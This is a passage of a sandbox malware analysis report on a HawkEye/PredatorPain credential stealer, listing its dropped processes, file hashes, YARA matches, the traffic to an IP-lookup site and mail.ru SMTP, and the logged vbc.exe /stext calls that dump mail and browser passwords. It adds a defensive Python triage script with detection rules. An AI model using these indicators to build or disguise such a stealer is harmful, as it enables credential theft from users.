Sep 6, 2021 11:22:25.848732948 CEST | 1205 | OUT | GET / HTTP/1.1
    Host: whatismyipaddress.com
    Connection: Keep-Alive
Sep 6, 2021 11:22:25.883661032 CEST | 1205 | IN | HTTP/1.1 403 Forbidden
    Date: Mon, 06 Sep 2021 09:22:25 GMT
    Content-Type: text/plain; charset=UTF-8
    Content-Length: 16
    Connection: keep-alive
    X-Frame-Options: SAMEORIGIN
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Server: cloudflare
    CF-RAY: 68a6a1ff98f21782-FRA
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
    Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30
    Data Ascii: error code: 1020


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49715 | 104.16.154.36 | 80 | C:\Users\user\AppData\Local\Temp\taskhost.exe

Timestamp | kBytes transferred | Direction | Data
Sep 6, 2021 11:22:33.865338087 CEST | 1235 | OUT | GET / HTTP/1.1
    Host: whatismyipaddress.com
    Connection: Keep-Alive
Sep 6, 2021 11:22:33.904181004 CEST | 1236 | IN | HTTP/1.1 403 Forbidden
    Date: Mon, 06 Sep 2021 09:22:33 GMT
    Content-Type: text/plain; charset=UTF-8
    Content-Length: 16
    Connection: keep-alive
    X-Frame-Options: SAMEORIGIN
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Server: cloudflare
    CF-RAY: 68a6a231bab84ed9-FRA
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
    Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30
    Data Ascii: error code: 1020


                                                                    SMTP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Sep 6, 2021 11:22:24.654927015 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3 | 220 smtp57.i.mail.ru ESMTP ready (Looking for Mail for your domain? Visit https://biz.mail.ru)
Sep 6, 2021 11:22:24.655308962 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160 | EHLO 704672
Sep 6, 2021 11:22:24.710182905 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3 | 250-smtp57.i.mail.ru
    250-SIZE 73400320
    250-8BITMIME
    250-PIPELINING
    250 STARTTLS
Sep 6, 2021 11:22:24.710491896 CEST | 49711 | 587 | 192.168.2.3 | 94.100.180.160 | STARTTLS
Sep 6, 2021 11:22:24.764374018 CEST | 587 | 49711 | 94.100.180.160 | 192.168.2.3 | 220 2.0.0 Start TLS
Sep 6, 2021 11:22:35.477663994 CEST | 587 | 49718 | 94.100.180.160 | 192.168.2.3 | 220 smtp29.i.mail.ru ESMTP ready (Looking for Mail for your domain? Visit https://biz.mail.ru)
Sep 6, 2021 11:22:35.564328909 CEST | 49718 | 587 | 192.168.2.3 | 94.100.180.160 | EHLO 704672
Sep 6, 2021 11:22:35.616727114 CEST | 587 | 49718 | 94.100.180.160 | 192.168.2.3 | 250-smtp29.i.mail.ru
    250-SIZE 73400320
    250-8BITMIME
    250-PIPELINING
    250 STARTTLS
Sep 6, 2021 11:22:35.617120028 CEST | 49718 | 587 | 192.168.2.3 | 94.100.180.160 | STARTTLS
Sep 6, 2021 11:22:35.668801069 CEST | 587 | 49718 | 94.100.180.160 | 192.168.2.3 | 220 2.0.0 Start TLS
Sep 6, 2021 11:22:35.688143015 CEST | 587 | 49719 | 94.100.180.160 | 192.168.2.3 | 220 smtp36.i.mail.ru ESMTP ready (Looking for Mail for your domain? Visit https://biz.mail.ru)
Sep 6, 2021 11:22:35.689376116 CEST | 49719 | 587 | 192.168.2.3 | 94.100.180.160 | EHLO 704672
Sep 6, 2021 11:22:35.741569996 CEST | 587 | 49719 | 94.100.180.160 | 192.168.2.3 | 250-smtp36.i.mail.ru
    250-SIZE 73400320
    250-8BITMIME
    250-PIPELINING
    250 STARTTLS
Sep 6, 2021 11:22:35.741786003 CEST | 49719 | 587 | 192.168.2.3 | 94.100.180.160 | STARTTLS
Sep 6, 2021 11:22:35.794620991 CEST | 587 | 49719 | 94.100.180.160 | 192.168.2.3 | 220 2.0.0 Start TLS
Sep 6, 2021 11:22:37.609016895 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3 | 220 smtp32.i.mail.ru ESMTP ready (Looking for Mail for your domain? Visit https://biz.mail.ru)
Sep 6, 2021 11:22:37.609217882 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160 | EHLO 704672
Sep 6, 2021 11:22:37.660432100 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3 | 250-smtp32.i.mail.ru
    250-SIZE 73400320
    250-8BITMIME
    250-PIPELINING
    250 STARTTLS
Sep 6, 2021 11:22:37.660605907 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160 | STARTTLS
Sep 6, 2021 11:22:37.713546038 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3 | 220 2.0.0 Start TLS
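The HTTP and SMTP tables above show the two network habits that make this sample easy to triage: a bare GET to whatismyipaddress.com from a taskhost.exe running out of %TEMP%, sent with only Host and Connection headers and no User-Agent (Cloudflare answers 403 / error 1020), and then repeated SMTP submission sessions to smtp.mail.ru on port 587 whose EHLO carries the bare token 704672 rather than a FQDN, followed immediately by STARTTLS. The report does not record which process opened the SMTP sessions, so the rule below does not assume one. The following is an added example, not part of the Joe Sandbox report and not HawkEye's own code; the record types and sample records are constructed from values in the tables, and the name lists, the list of user-writable directories and the port set are assumptions.

```python
"""Triage rules for the network pattern recorded in the report above.

Added example; it is not part of the Joe Sandbox report and not HawkEye code.
The record types and the sample records are constructed from values in the
report's tables; the name lists, directory list and port set are assumptions.
"""
from __future__ import annotations

import ipaddress
import re
from dataclasses import dataclass

# Windows system-binary names the report shows dropped into %TEMP%
# (svchost.exe, taskhost.exe); the other two are assumed additions.
SYSTEM_BINARY_NAMES = {"svchost.exe", "taskhost.exe", "explorer.exe", "lsass.exe"}
# External-IP lookup services; whatismyipaddress.com is from the report,
# the others are assumed additions.
IP_LOOKUP_HOSTS = {"whatismyipaddress.com", "checkip.dyndns.org", "api.ipify.org"}
SMTP_PORTS = {25, 465, 587}
# User-writable directories a system binary should never run from (assumption).
USER_WRITABLE = re.compile(r"\\(AppData\\Local\\Temp|AppData\\Roaming|Users\\Public)\\", re.I)


@dataclass
class HttpRequest:
    process: str
    host: str
    headers: dict[str, str]


@dataclass
class SmtpSession:
    dst_ip: str
    dst_port: int
    client_commands: tuple[str, ...]  # client-side SMTP commands, in order


def is_masquerading_drop(path: str) -> bool:
    """A system-binary file name living in a user-writable directory, not System32."""
    name = path.rsplit("\\", 1)[-1].lower()
    return name in SYSTEM_BINARY_NAMES and USER_WRITABLE.search(path) is not None


def is_ip_check(req: HttpRequest) -> bool:
    """GET to an IP-lookup service with no User-Agent header.

    Browsers always send User-Agent; the report's request carries only Host
    and Connection, which is what a bare HTTP library call looks like."""
    names = {k.lower() for k in req.headers}
    return req.host.lower() in IP_LOOKUP_HOSTS and "user-agent" not in names


def is_direct_submission(sess: SmtpSession) -> bool:
    """SMTP submission to a public server where EHLO carries a bare token.

    RFC 5321 expects EHLO to carry a FQDN or an address literal; a bare token
    such as the report's '704672' points at an embedded mail library rather
    than a configured mail client."""
    if sess.dst_port not in SMTP_PORTS:
        return False
    if ipaddress.ip_address(sess.dst_ip).is_private:
        return False
    ehlo = next((c for c in sess.client_commands
                 if c.upper().startswith(("EHLO ", "HELO "))), None)
    if ehlo is None:
        return False
    parts = ehlo.split(None, 1)
    if len(parts) < 2:          # EHLO with an empty argument is not a FQDN either
        return True
    arg = parts[1].strip()
    return "." not in arg and not arg.startswith("[")


def triage(process_paths, http_requests, smtp_sessions) -> list[str]:
    """Run all three rules and return one finding string per hit."""
    findings = []
    for path in process_paths:
        if is_masquerading_drop(path):
            findings.append(f"masquerading drop: {path}")
    for req in http_requests:
        if is_ip_check(req):
            findings.append(f"external IP check: {req.process} -> {req.host}")
    for sess in smtp_sessions:
        if is_direct_submission(sess):
            findings.append(f"direct SMTP submission: {sess.dst_ip}:{sess.dst_port}")
    return findings


# Constructed sample records mirroring the report's tables (not a log export).
SAMPLE_PROCESSES = [
    r"C:\Users\user\Desktop\aaVb1xEmrd.exe",
    r"C:\Users\user\AppData\Local\Temp\svchost.exe",
    r"C:\Users\user\AppData\Local\Temp\taskhost.exe",
]
SAMPLE_HTTP = [
    HttpRequest(r"C:\Users\user\AppData\Local\Temp\taskhost.exe", "whatismyipaddress.com",
                {"Host": "whatismyipaddress.com", "Connection": "Keep-Alive"}),
]
SAMPLE_SMTP = [SmtpSession("94.100.180.160", 587, ("EHLO 704672", "STARTTLS"))]

if __name__ == "__main__":
    for line in triage(SAMPLE_PROCESSES, SAMPLE_HTTP, SAMPLE_SMTP):
        print(line)
```

Each rule is weak on its own (an IT script may legitimately query an IP-lookup service, and plenty of small mailers send a bare EHLO token), which is why triage() reports them together: the combination of a system-named binary in %TEMP%, an IP check without a User-Agent, and direct submission to a public mail provider is the HawkEye profile, not any single line.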

                                                                    Code Manipulations

Statistics: CPU Usage, Memory Usage, High Level Behavior Distribution, Behavior (interactive per-process charts)

                                                                    System Behavior

General

Start time: 11:22:15
Start date: 06/09/2021
Path: C:\Users\user\Desktop\aaVb1xEmrd.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\aaVb1xEmrd.exe'
Imagebase: 0x400000
File size: 835015 bytes
MD5 hash: C428B176ECA6B17CDA3F5729ABADDF0B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 11:22:16
Start date: 06/09/2021
Path: C:\Users\user\AppData\Local\Temp\MULTIBOT_NEWW.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Temp\MULTIBOT_NEWW.exe'
Imagebase: 0x7ff7488e0000
File size: 106496 bytes
MD5 hash: 3F620FFD8BE649D1D31AB54F73A559BE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Visual Basic
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation: low

General

Start time: 11:22:17
Start date: 06/09/2021
Path: C:\Users\user\AppData\Local\Temp\svchost.exe
Wow64 process (32bit): false
Commandline: 'C:\Users\user\AppData\Local\Temp\svchost.exe'
Imagebase: 0xf30000
File size: 57344 bytes
MD5 hash: A273A781070D239BA99D3FD8EF341E6C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Reputation: low

General

Start time: 11:22:17
Start date: 06/09/2021
Path: C:\Users\user\AppData\Local\Temp\taskhost.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Temp\taskhost.exe'
Imagebase: 0x9c0000
File size: 533504 bytes
MD5 hash: 83827B8CFFE67A789B03E342ED3B1572
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000003.247040604.0000000007404000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000003.247040604.0000000007404000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000003.247040604.0000000007404000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000003.247040604.0000000007404000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000003.247040604.0000000007404000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, Author: Arnim Rupp
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, Author: JPCERT/CC Incident Response Group
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    Reputation:low

                                                                    General

                                                                    Start time:11:22:18
                                                                    Start date:06/09/2021
                                                                    Path:C:\Users\user\AppData\Local\Temp\iExplorer.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\iExplorer.exe'
                                                                    Imagebase:0x6d0000
                                                                    File size:724480 bytes
                                                                    MD5 hash:A0DBD1314D214588960B1E0BCED5F4E0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: RAT_PredatorPain, Description: Detects PredatorPain RAT, Source: 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_PredatorPainRAT, Description: Yara detected PredatorPainRAT, Source: 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, Author: Joe Security
                                                                    • Rule: PredatorPain, Description: unknown, Source: 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: RAT_PredatorPain, Description: Detects PredatorPain RAT, Source: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_PredatorPainRAT, Description: Yara detected PredatorPainRAT, Source: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, Author: Joe Security
                                                                    • Rule: PredatorPain, Description: unknown, Source: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: RAT_PredatorPain, Description: Detects PredatorPain RAT, Source: 00000007.00000003.242361286.0000000000EC4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_PredatorPainRAT, Description: Yara detected PredatorPainRAT, Source: 00000007.00000003.242361286.0000000000EC4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: RAT_PredatorPain, Description: Detects PredatorPain RAT, Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, Author: Arnim Rupp
                                                                    • Rule: JoeSecurity_PredatorPainRAT, Description: Yara detected PredatorPainRAT, Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, Author: Joe Security
                                                                    • Rule: PredatorPain, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    Reputation:low

                                                                    General

                                                                    Start time:11:22:27
                                                                    Start date:06/09/2021
                                                                    Path:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\AppData\Roaming\Windows Update.exe'
                                                                    Imagebase:0x3d0000
                                                                    File size:724480 bytes
                                                                    MD5 hash:A0DBD1314D214588960B1E0BCED5F4E0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000000.283523438.0000000003B61000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.313456976.0000000003D6C000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: RAT_PredatorPain, Description: Detects PredatorPain RAT, Source: 00000008.00000000.276336479.00000000003D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_PredatorPainRAT, Description: Yara detected PredatorPainRAT, Source: 00000008.00000000.276336479.00000000003D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000000.276336479.00000000003D2000.00000002.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000000.276336479.00000000003D2000.00000002.00020000.sdmp, Author: Joe Security
                                                                    • Rule: PredatorPain, Description: unknown, Source: 00000008.00000000.276336479.00000000003D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: RAT_PredatorPain, Description: Detects PredatorPain RAT, Source: 00000008.00000000.247374939.00000000003D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_PredatorPainRAT, Description: Yara detected PredatorPainRAT, Source: 00000008.00000000.247374939.00000000003D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000000.247374939.00000000003D2000.00000002.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000000.247374939.00000000003D2000.00000002.00020000.sdmp, Author: Joe Security
                                                                    • Rule: PredatorPain, Description: unknown, Source: 00000008.00000000.247374939.00000000003D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: RAT_PredatorPain, Description: Detects PredatorPain RAT, Source: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_PredatorPainRAT, Description: Yara detected PredatorPainRAT, Source: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Author: Joe Security
                                                                    • Rule: PredatorPain, Description: unknown, Source: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000000.293259909.0000000003B61000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: RAT_PredatorPain, Description: Detects PredatorPain RAT, Source: 00000008.00000000.290325606.0000000002B61000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_PredatorPainRAT, Description: Yara detected PredatorPainRAT, Source: 00000008.00000000.290325606.0000000002B61000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: PredatorPain, Description: unknown, Source: 00000008.00000000.290325606.0000000002B61000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: RAT_PredatorPain, Description: Detects PredatorPain RAT, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Arnim Rupp
                                                                    • Rule: JoeSecurity_PredatorPainRAT, Description: Yara detected PredatorPainRAT, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                    • Rule: PredatorPain, Description: unknown, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    Reputation:low

                                                                    General

                                                                    Start time:11:22:27
                                                                    Start date:06/09/2021
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:dw20.exe -x -s 2200
                                                                    Imagebase:0x10000000
                                                                    File size:33936 bytes
                                                                    MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:11:22:30
                                                                    Start date:06/09/2021
                                                                    Path:C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:'C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe'
                                                                    Imagebase:0xbc0000
                                                                    File size:57344 bytes
                                                                    MD5 hash:A273A781070D239BA99D3FD8EF341E6C
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 71%, Metadefender, Browse
                                                                    • Detection: 86%, ReversingLabs
                                                                    Reputation:low

                                                                    General

                                                                    Start time:11:22:30
                                                                    Start date:06/09/2021
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                                    Imagebase:0x400000
                                                                    File size:1171592 bytes
                                                                    MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:11:22:32
                                                                    Start date:06/09/2021
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                                                                    Imagebase:0x400000
                                                                    File size:1171592 bytes
                                                                    MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:11:22:33
                                                                    Start date:06/09/2021
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                    Imagebase:0x7ff7488e0000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:11:22:34
                                                                    Start date:06/09/2021
                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6280 -s 176
                                                                    Imagebase:0xb20000
                                                                    File size:434592 bytes
                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:11:22:35
                                                                    Start date:06/09/2021
                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6292 -s 176
                                                                    Imagebase:0xb20000
                                                                    File size:434592 bytes
                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:11:22:36
                                                                    Start date:06/09/2021
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:dw20.exe -x -s 2324
                                                                    Imagebase:0x10000000
                                                                    File size:33936 bytes
                                                                    MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:11:22:36
                                                                    Start date:06/09/2021
                                                                    Path:C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:'C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe'
                                                                    Imagebase:0x320000
                                                                    File size:57344 bytes
                                                                    MD5 hash:A273A781070D239BA99D3FD8EF341E6C
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Reputation:low

